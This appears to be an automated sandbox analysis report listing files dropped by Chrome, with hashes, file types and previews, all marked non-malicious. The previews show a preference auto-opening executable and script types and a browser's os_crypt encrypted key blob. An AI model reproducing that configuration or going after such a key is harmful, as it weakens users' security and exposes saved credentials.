C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c74feff5-d209-4756-b62d-3807b4d1429b.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9378
Entropy (8bit):	5.154114775858602
Encrypted:	false
SSDEEP:	192:YYP1XcaM88yy+F3p7YakCrMkoFPwbdplKiWQbDYpqn0ttjEsXtSct:YOp+yx36mrml6YtIsXtSct
MD5:	A6A8456BF6CE4AC2CE0C0209217A7077
SHA1:	1A0F44AC4717111AC29EDE34DEEBFC4E8400915C
SHA-256:	5D369C1968DD8407650FA7359353BC48E94B92D6B1BC2F70745C264F754E6AC8
SHA-512:	5D00FC87FB7ED8FBA815077DED7147740E99D6AB4468B606DA88D1171150F9207F46AD8701901D29A36CBD25A7B7CCE6C88D81AD499660947C86B7F88381CF96
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305724952797194","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305724952778790"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cc7192be-a711-488f-92e4-94f2d21c7c97.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9161
Entropy (8bit):	5.147318290349768
Encrypted:	false
SSDEEP:	192:YYP1XcaM88yy+F3p7Y9ko+cPwbdplKiWQbDYpqn0ttjEsXtSc+:YOp+yx36b+s6YtIsXtSc+
MD5:	02C3F53109C1A30D76E25EE1BCCDF703
SHA1:	4D41356E540193D6ED2355FF346682D0213AA766
SHA-256:	B0AF8C6021C8D69BC626526F98FF31F29F2C6286F289BFC2F8B871E993F06AF5
SHA-512:	53889CAEF6C70C0D027EB83717B46811AD543F2D8AF45E6C69DC857232375DBF7349AC9E2ECBFC1D939ED6B2743B06C583490907EAAF41BF4D16321B812B8DB4
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305724952797194","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305724952778790"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e3262106-ba41-49ab-b958-87d1b053c2a7.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9442
Entropy (8bit):	5.154013890947821
Encrypted:	false
SSDEEP:	192:YYP1XcaM88yy+F3p7Y4ksOkoUcwbdplKiWQbDYpqn0ttjEsXtSct:YOp+yx36S4T6YtIsXtSct
MD5:	E25E9393D62463A95F922A0913971E64
SHA1:	CBB6FAD4D418BDD0368FA2B18EA7475A174C3BD1
SHA-256:	11538FEFB254DEB262CBB851EC2F1611471523610E20FBB6E5E98246870BAF98
SHA-512:	B75F7FF6AC9861C6A30DBD0C54DF130F532222637725D63220F8A90806D64D7F32FBFF467CC7DB25D0395D108BB92794DABA19D95292EB25876B5FFB69E0FED1
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305724952797194","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305724952778790"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1e5b57c5-c0d1-4b74-8aa1-ffef99501eba\model.tflite (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	392048
Entropy (8bit):	5.826576770481211
Encrypted:	false
SSDEEP:	6144:4i8mNiZGi+jiwubrNEOB37+rNiyykvXpqQC7SaPGNFzq/RnfAmn+qGk07U0z9zMl:WqEGi+GwGrNv9+r8bkvXpqQMLuNy5YmJ
MD5:	6D7C2F9E94664539DEC99B3233301B01
SHA1:	85812B004742CC1C211C92911131CE270F8BA769
SHA-256:	A0956386DC64FD9F4883C8741F950CD60A56859616B159C9E4251C9EB0AC5534
SHA-512:	4D06917F30651C3BF13C509AAE79793B3F1EC93DE12179464B18FD9FD16C7BF466884B1C70E425D7E937ADDE341CF24BD08F19A132BBB9683E804F29B4ED0C33
Malicious:	false
Reputation:	unknown
Preview:	....TFL3........................................4.......................%.......min_runtime_version.'..........................t...h...T...8...,.............................................................t........C...C..............x...d...X...<..........................>...........1.11.0..............J..............................j.............B@z...........f.@...................yw....z.......................w...........y.......y....i.....x............yy...y...xyw.x..........y....y..........zg...zyi..i.h...y....x..........y..x.y.y...x.......x....yx...y...........xxx.i..........y....y.......xzx.yxw.w.......y..yx...z.................................w.w..x.y....x....yy...h.......y..y...y........y........h....y............y....y.......x..y....y..y..w.x..........y....yx.x.......y....y........yx..y.y..f...i.x........yy..i.y...yy...y..x....x....x..y..yz...x..z....y....h..w.w..x.x......w..wi....xw...................h.e..........xy...y..x....y.y...............x..hxyx.zY......w....y...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5c0d2437-5105-42d5-85f1-f7d8a4e87c1e\global-entities_metadata (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	29747719
Entropy (8bit):	7.553089146596958
Encrypted:	false
SSDEEP:	393216:Aiq7Mc1oteqlInpBOzSUd20vf2yUjsPdIWhQ8GeoqxcjFXuFat2WnmrRJE:AL7RokZBOzHd2r5sPiW5ogcjkFavqjE
MD5:	4A5251EF82B401065C18CF9ABFA28F46
SHA1:	38919DCB91872F95BCA242779BD0D1A857AD512F
SHA-256:	379EA3CBD805228A25A4645E3B7500B54FB0ED51342674A704F08EA22E86C1BB
SHA-512:	9E3DA5F7EC8917F8F8E305B8E17D5B39CE800D2E5328EF244D647B27DF2FCF28E0711ED0242C73B00D21EB6A346A391CDA5C8AA3191B49D217EE0C3215DC5F7B
Malicious:	false
Reputation:	unknown
Preview:	. .i............. Los Angeles County Museum of Art...49+..BC. Z?.4.....f].z...qF....w....9i...[.M.....s......b.....j..................Z\|?....?........A\|.....%.S^S..$.........z.........E..(......<.{.. .......h.. ......@Lf..,.i....?.fff?......%...].....+....@..Air freshener..f........6.6...Date Ariane..:. .A..Z.Z.V..F..6..8._.R..z...v...52....9<....6...".......W'..$.........U.#...K..,n..$.........5.(........5.}.&.....2....I%Visual design elements and principles. }^.z...xf...=.>4...==.p1.O_.......O..F....%..e...~Q......d.....+.l?.33s?........@.[{.6.....9%4...Makar Sankranti.... ><.r..9..A.[L..%.._........r..$.........s..$.....3..~I(....8...8.#.....m)C..Ajiaco..@. .Q`...}6.Ix.\|L~.AJ.c..T......z......)..IZ.c.t.......r..$.....4.d$w9( ........p.% ........s.$.....-.3.u($......@.r..H .......t.H......"!q...Xiumin..$H)..#J6. .[....m\....].qf.6.g.nI.\...Yr.. ...b........k...4.z....(..c...$........P..(......../.... ....K...(..(........Q.........A.4..Ray Sahetapyv........40.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5c0d2437-5105-42d5-85f1-f7d8a4e87c1e\global-entities_names (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Applesoft BASIC program data, first line number 9
Category:	dropped
Size (bytes):	26510576
Entropy (8bit):	6.945059200432203
Encrypted:	false
SSDEEP:	196608:rGivLHpQn5wcHmIHfkK0nNG78ig/U3YkWM2WY4aBsWraubKnsjWeMjO/l7Ju:rG6LcLHm/ngOM2dqzWKniWPsu
MD5:	07CD1F4E37FDF896D45F6308E679D6D3
SHA1:	BF4C0D90D1A02468F5095F7BD144781434DC6C73
SHA-256:	483A454B9A0E2F35B988BDF28C553CEA4A525695E1274868A0CBF15F08FE6FC8
SHA-512:	A34C4DBCAB8F2CE42F9415AE1695D601660981BD0708EF31A1F49799D48E07785E3C17CB87D0360FBE2994CA1E13A78683B53CE77D5538B28A70CAEE4F038B52
Malicious:	false
Reputation:	unknown
Preview:	............ ....(8...!~.uv... ......(;...2ht.jC.. ....("...b..de... ....(c...p...*... ...(p...sa .$... .......(....x`..._.. .....(7...\|..[Q... ..-(=....X..\... .....(S.....D..... .......(,........... ....(0....Qic\|f.. ......(L....E.7.... ....(>........... .......(w........... ....(N....l..... ...(i......z._.... ....(\....pH..... ...%(L....n.Swr.. .......(R....i..AB.. ......(......gqGeQ.. .......(h.....[%Z+.. .....(K.......... ....(K.....W... ......(Z....e"..... ....(6....9.().. ..4(\.....6.6u.. ....(@...#M.C.... ......(?...&..@&V.. ....(7......{f.. .....(\|...(.,n}p.. ....(`...6....S.. .....(0.....7s.."... ...(z...=..... ......(<...X/.{E... ....(U...iR./.9.. .......(A...m'.n2... .......(K...{"z.<Z.. ....(9....BIOQ... ...(`....F5.... ..2(H.......)... ....(/......0.b.. .....(r....W.... .......(7.....5.E.. ....(u....3D.... ....#(Q....DI.Z.. ....(z....+.uP... .....(H......... ....(X......O.S.n.. ....(7....z.(P.. ....\|(%.....4..1... .......(b..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5c0d2437-5105-42d5-85f1-f7d8a4e87c1e\global-entities_names_filter (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	830721
Entropy (8bit):	7.450847459983356
Encrypted:	false
SSDEEP:	24576:+F/VsiP4eEOWMwIBOyqFJ8TBwy0zktBKMXDWZu:oV6eJBmFJGBFhSu
MD5:	8499188718D6C9173DEE32B234CA5C3E
SHA1:	12176AFFCAF756D85AB964C4766E91FF191B18EB
SHA-256:	BD4718F4CB57F283E79560D4D0F2BF7C912145BF4AFF65C99DD27B5BEBBA0D04
SHA-512:	D1A25EF9DE6113B8EC682061FA629473B86AD04A1AC901CB365C075EBB206D15301CEA26E599D007F4A5177EAD2FA8120E97D67A6DFA16D4EFFFEF3B6A190AB0
Malicious:	false
Reputation:	unknown
Preview:	....@(a.Hx.O....T$..?c5P 0R`CA..J. .0.. s.@...$.....D.@.`.(..#D...b.@.."_$(.@.!1j_........p.zL..dQ...PT.2.S..`..,...@.../..!.S..50.!..!.X..A?...@+.Hr.dW..%$.,...."...(....`..%!.P.\|n@S....@.........9 Hs......F........0.qx....V...0T..!..P.7`!.x.!q.@...<..-"HJ.Pd`.h.0..-..W.`.@.j.A`...."vR.l..t`G.<..C.c.b.@.0..(q..4....Q..A)...@D@......U..LJ@.!..2@..%9..$.H....UNC).(B..j.c....J........\|...3......dB0.9.H..DFd.".pP..... ....'.......k@@A...!T.h.".HPp.b.....V@@O.\|D....!5]....,..D)..'...".... .W.Aq.....\|.@. @.MP.T0...0...A.a...pR..X`..P....... ..I...HN..!./.p.....J..4.......q..c.I.. .r8X..a.........C....hs5... $.Q..V$x.JP.[i....e....Ah....@.@.!#.4N...K....@0..H.4I0..xH.z8..........L.9..C@....$.r......,.. .y0.`.........$l.......@x..).c")..U.l.@CP... ...g.!....p+."@...p.x..`g.4.0F.0N....BHdd@ ..."0...Q2.b.@H.$..8..Gp.$.V x%DThEB...I.8..K....W..`i.Y I.....B..4.YIgJ..6c..B...D.e"Fe."(. r......`....PC.K.P.2.@h.A...Lb`.........P"..@...4..SH...e...(.....g..E....$-B:.FQH..c.}.^.@.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5c0d2437-5105-42d5-85f1-f7d8a4e87c1e\global-entities_prefixes_filter (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	232904
Entropy (8bit):	7.557578420892044
Encrypted:	false
SSDEEP:	6144:WQr6kjXfX5w0PznLILqQce7hGpuMOkqTjViv6BYNwEFWML:WS1XxwSQYqDKNxF1
MD5:	00E11BEA8605B30D9B333531C53D3E75
SHA1:	E9B5596AFE1CE6B9D48F6873DF73904245A62190
SHA-256:	BB1837C8878F22469FE37632D964C7BAFC074661077A0AA3D2BF7DDB2A2F6C30
SHA-512:	9FCDA1AC533DF7B159E3B2C8B3E98969B8D6160DF127C82675FB2A0FD14E170CBDD80891D32B6D57054CF00C7CAC3D3F9F807C6EE73E683B1BB8AAFC4077111A
Malicious:	false
Reputation:	unknown
Preview:	......4.-0......A..@..H..A..^..,!R...U....HP...... E...iS ......Hf.f..d....;..;;........h.#2..@...$1....... D.Dp......&....UXT...(.mP.B..rBN.#..{......z...Q5...A..fw.67s?qsc.C.. ..B #@.P2...&...% gB(......j..B!. . ...$C.........) ......P...."..8Cf...E......~.w...Apt..P@...1d4..e.@0. U.b.g..0.8.3...Y..8.t...... A.e\...B.aD....U..1..!..}.........%c.:......^.......C...@..:..+...E...i.0(..A@.vq.8.!..E#.uG.O.....X.W....1.`..s......E.f0a....l..=.$.B.......N.....C.. ..........."...v. J.)ad/.....N...H.1.Lb".'vw.uv.g.7.S...........c......d...Tp..m....y.H......fCp....TP....=@. ...@..X..A..u8#\|........M~.&...K]......$.......].4.....Ok..`..@0$.D..x@..@d..."..CbMp!(`....D.;0$P ............._..!.T..,"..".....)....GC......TpJ.C.0T.."2..7......$..I..f...2.p..).l.J..0..............p`. m..9....@...p. Cp..x'D.)..........~..... ..dD.L.b.)=.z@..$a.@e..&hw..fwc.w.{3..qfT,R,....%.T.(L .#...4.8....TS..>.n... ..w.)....BLp. `.......A.N@(C.XA".............f.FpC"[.X.. h........"..F.....h.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5c0d2437-5105-42d5-85f1-f7d8a4e87c1e\model.tflite (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	410376
Entropy (8bit):	7.178086442654218
Encrypted:	false
SSDEEP:	6144:j4Ym8gmGjPFQAywKthp8kyRNjfEJ39S5XSqwbquUIZOGhgWWnAtM9:0oGbFQAyIRdQ6CqweuUih164M9
MD5:	FBC9347A6B3346474EA54E3D597F0E61
SHA1:	CE88F31D16225EFC8F98B36C838BD09372053904
SHA-256:	39D421B174E1F5E7C241628D11CC07BC3E2D50A750A61B2F35582A8FFB65482B
SHA-512:	56A26AEAD2439E8D8008F661A1CC8A27C147A0E9D1846044CE8A7DEDC371D3AE2286EFD4E038AFBBA829BC19BB4D92A8457D5F05C10F44D5750B3B1D7E59642D
Malicious:	false
Reputation:	unknown
Preview:	....TFL3.. .............................t...4...D...(A..............4.......................CONVERSION_METADATA.........................min_runtime_version.....................................\|...t......T......4.........................l...P...4...........x.......r..Hr..8b...a...Q...Q...@..h@..X0.../......(...........x...h...........8...(..................X...H................z..xy..hi...h...X..8X..(H...G...7...6...&..X&..H...................x...h...X...........(...........x.........H...8........p...p..._..._...W...W..dW..HW..(W...W...V...V...V...V..\|V..\V..DV..(V...V...U...U...U...E...E...E..lE..XE..H5..(5...5...4...$......................x...h...X...H...8...(t...d...T...C...3...#......................x...h...T..............\|...`...D...,.............@.............<...................l......L.......,...........\|......\......<...................l......L.......,...........\|......\......<...................l......L.......,...........\|......\......<...................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5c0d2437-5105-42d5-85f1-f7d8a4e87c1e\model_metadata.pb (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	2792
Entropy (8bit):	5.0622742873807205
Encrypted:	false
SSDEEP:	48:oH38zzAzeUnVRlCp+S6NqUTwcxlmErwwy11AYcrbI2:oH3yAqUnvlCQfNqU/211X2
MD5:	CB144D21AE33C33A1192CAD6223A1076
SHA1:	A7AECDCA8C8687A4C73362000B5B06A5038057DC
SHA-256:	074C82B74B3999119AC2321A1ECB933946DA95AD72D2CBF73B71003CEF93F1F1
SHA-512:	E6EC4BBBBC8648AA6BEF90BBC2FE988A7E187D40D9A8C709B4655909FFA61C11B9343382B4F87938DB78F7CB233AF0EAD608B8717C30278DA45E710F95220DF2
Malicious:	false
Reputation:	unknown
Preview:	......0.H.P.X..."...../collection/accommodations"...../collection/actors"...../collection/airports"%...!/collection/anatomical_structures"...../collection/artworks"...../collection/athletes"...../collection/authors"...../collection/book_editions"#..../collection/business_operations"...../collection/cars"...../collection/causes_of_death"8...4/collection/celestial_object_with_coordinate_systems""..../collection/chemical_compounds"!..../collection/consumer_products"..=../collection/countries"..>../collection/cuisines"!..../collection/culinary_measures"...../collection/currencies"...../collection/diets"-...)/collection/disease_or_medical_conditions"(.?.$/collection/educational_institutions"...../collection/employers"...../collection/events"$... /collection/fictional_characters"...../collection/film_actors"%...!/collection/film_screening_venues"...../collection/film_series"...../collection/films"..@../collection/foods"...../collection/garments"".A../collection/geo/business_chain"!.B../colle

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5c0d2437-5105-42d5-85f1-f7d8a4e87c1e\word_embeddings (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	1149370
Entropy (8bit):	6.989299810768632
Encrypted:	false
SSDEEP:	24576:lyct25h2qYEYfvGjCx8/U6co9bkDhUqPtRxM8Z9cWALISy8B:45h2hLv0CKU0kDPVLZ9cWzSbB
MD5:	8F10D6BCB0B9AD4DF0EA6C046C89B710
SHA1:	EAAC7DFC9EC6E5CDE1A96929AC7E1BD8A3B48E69
SHA-256:	3240EF3FDCA04A5FFC52E7429EBFD8D0227C37F6BE62DF230F25D65EC9AABB19
SHA-512:	1575937679E90E444B29EA258A84E4CF31B0E12BA9426DF8AC34C28FC49F1D9EDC77D684E3937646807D668BD2E68FFEB21342B056B8E36FE992F4F2A715B9C4
Malicious:	false
Reputation:	unknown
Preview:	.. ....v..r....f...w..f..jpk.m.tu..}.}Z.. ...x.O.`yyzx.t._..\|s~..y..x..oozu.^.. .y.O_.t..^h....k...bW..x}yS.Rs..{.z.. .\..w.....hx...c.y.a..e.l....cu~.... ...kk...x.....z{.j..w..~...ln~.nw{s.. .y.a.nn[Mp.k.zj.......ihxk{q...@k.... ..Lm.toz``y}.Ysr..~..g.i~._...hr.:.. .e.k{x..Xe.f....dwn..\|...g.e..^ae{X.. .".a2kR.a\|nH.F.^kT.j....c.../....qI.. w.qu.w.v......y.qY....ow..mWjs}u.r.. ...\|.b.\|.xtX.\|.m{UUY..f..h.\|.vh`\.v.. .......y]x..}.y...^....d..k..wmx..... ...u}}...uz..[.j\e]..g~.G..i.qI.z.^.. o..n{.jK....Xe..b~.gz.Xd.ev...o..... ..bP.p..Nngg..Zvvq..zZ.O_}.i....Z[.. &..p....w.e}.qYn.}.[}nceovV.d...q.... .'0....bp...qe..JM\|.\|lp.}~..p.h...X... 1WJ.j...~l.....ht.h....~.....js..{d.. 3/q\|}.X.....f..A.[....hsU.`J_r[.h[... 57.....u..b.{iysKqw..wn.i..r~..z.R... :....v.g....\|yW..w.{..fxi\|d.....`t... ;.Vq_n.}.u.\|m..iX.o.j.mno_...ro...... =^tm.~.....t\...r.Uo.}tsuZu......m~.. B.R~a.i^Z....zp...i.o..i...{z..r}v... D.-..Z.iq...Uze...apg6`.jWA..rj...... Fk..{ndV...SO.ih._.t....ye..qt...Yx.. H.>.ueWp.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b97edcc6-ab78-42a6-a082-bc0c4131e219\model.tflite (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	27244
Entropy (8bit):	3.8842802707357547
Encrypted:	false
SSDEEP:	768:fUhIi/t/ZHNb6uqTKDW+y15z+3XBvd/JoL34F8CC6IYYr1lNKnTHa5xNSM+6O/gd:iIilRtb6uqTKDW+y15z+nBvd/JoL34Fw
MD5:	89932ADF9CC14986CA58687A6FAD996D
SHA1:	0F96CBF80B1D7AE823A4A78C44CE61ACD2020BE9
SHA-256:	68E66131713862F4418E14512883753CA275304E971A078D907C463F295194B9
SHA-512:	5C5E0AD32D94886D3E73544676FC8BC90694922CA5E11B82A6E63D1F02F0626642D2B8B0A1B7C72FAC1ED8DFFD63DBCB26185708A59950BC4077F489CD624DB6
Malicious:	false
Reputation:	unknown
Preview:	....TFL3.. ..........................................i..........................<.......serving_default.........`...............output_0........................inputs......,.......................CONVERSION_METADATA................min_runtime_version..... ...................................p...\...H...4... ...................................l...X...D...0.......................................t...l...d...\...T...L...D...<...4...,...$...................................................................................\|...t...l...d...\...T...L...D...<...4...,...$...................................................................................\|...t...l...d...\...T...L...D...<...4...,...$...................................................................................\|...t...l...d...\...T...L...D...<...4...,...$...................................................t...`...L...8...$...................................p...\...H...4... ...................................l...X...D...0...........

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ef4a7272-0ed8-48b1-8606-01901db891f7\model.tflite (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	13924
Entropy (8bit):	4.524411316778424
Encrypted:	false
SSDEEP:	96:6ZuzUpYY9WW1H9xjMqvo0zjCOgxcyR7dCMUdvRWqIC2s8vvcr17/eFt9n9nFWB5A:JQEWh9x7ghb4r7pi4nBf+
MD5:	DD91CF850364320FA627573BEAAA8BDE
SHA1:	05F312EB672A32EF95ADEFC51A0BDC688C4B71AA
SHA-256:	CA54E4D1D1AE7932CE97FEDE0717956905BD9E796779ACC4C1A0BA75737F91AC
SHA-512:	B65A5D07646FDE821BE8A281002C2DB233E40184CF2E397443D5D659BE25679F5370AFD3C32D594FD828EBB37799147522357C40167711BC27C26E71CE066104
Malicious:	false
Reputation:	unknown
Preview:	....TFL3.. .............................t...@...P...$5..............4...........N...........CONVERSION_METADATA.............M...........min_runtime_version.O...........................................x...p...h...P...<...(...................................t...`...L...8...$...............................................................x...p...h...`...X...P...H...@...8...0...(... ...................................................................................x...X.......N.......D............... ...............................................2.11.0..............1.14.0.............................................................................................................................................................. ...$...(...,...0...4...8...<...n............d3?...=..............Z=.x.>...............<............................b$.?..............k...............5?..............X?............'5.?..............j.............6.5?&...........N.X?6...............F...........0..>V...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	106
Entropy (8bit):	3.138546519832722
Encrypted:	false
SSDEEP:	3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
MD5:	DE9EF0C5BCC012A3A1131988DEE272D8
SHA1:	FA9CCBDC969AC9E1474FCE773234B28D50951CD8
SHA-256:	3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
SHA-512:	CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
Malicious:	false
Reputation:	unknown
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.5654483718208256
Encrypted:	false
SSDEEP:	3:MRO6:MX
MD5:	729CC0F524BFE7B4599C6E6E5BF38507
SHA1:	1782FB371769697DF5E6A47FA12F38EB5B2A7EDE
SHA-256:	D121222427CD64AA6E9BD08EA710DDDC5BAC8A85B3D4564E428B9DD84E0880FF
SHA-512:	1BD8FC3A8CDA3105FC0AAF73CC7E14022D386F240EF28B749EBCC16588B907A166585D67CB1C866E8AE07ACFF6B44157ABD60E5F270F3B6AFFE4F9D328A09651
Malicious:	false
Reputation:	unknown
Preview:	104.0.5112.81

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	61214
Entropy (8bit):	6.071023394493198
Encrypted:	false
SSDEEP:	1536:cX71LMtANJaRBOHK5KvtgBhqQ0HTgHImA01exhi8qjyDKly2:o711NyBTOgd0HhmAnhqj3L
MD5:	A5D3EEB844DF6AAC6316AB23551F253C
SHA1:	B7ECC8CA2F3B650F812A8DE6449246E3DC7B4158
SHA-256:	473C3C1529EDD9195DD9FF6DF52D8EB4E04C01B0DBEB567A5E69DD5D81366149
SHA-512:	9E70475E38DF439220EE14E8332E33E67B88C2D4B47099DCAF810CC818A2CB135ACF610E54A20B28246D362C79F973C26791920A2A20426EC75BB95D111ABB75
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":"","last_whats_new_version":104,"shortcut_migration_version":"104.0.5112.81"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"invalidation":{"per_sender_topics_to_handler":{}},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639910128"},"policy":{"last_statistics_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	109716
Entropy (8bit):	3.74749647252685
Encrypted:	false
SSDEEP:	384:XaqgPM2OPn7o0tr6d6mtFKcVEK8nNArpv8o3jAWXHi/GbK6rlaAAkayxZpernDza:XJ2OYKy1ZaChLEegAcuVrnuUKi0say
MD5:	9EB7E7EC0CF16D693568F137B68124EF
SHA1:	5391868976C924D5BE0B1123F5EDFAB2064A2C02
SHA-256:	18934EEC30BA3931071F4687332759CC15D795FCA67BE3DEE489F9EF795EB07F
SHA-512:	13981F6C912BC0A9FAB124F6CCA8D8BB87DD08FF1A10D7DFCA6C7EBB56EADA275147737CE203117E7D658EF076CED870B66A9FC65CB7AD70D9B803B3ED0787C4
Malicious:	false
Reputation:	unknown
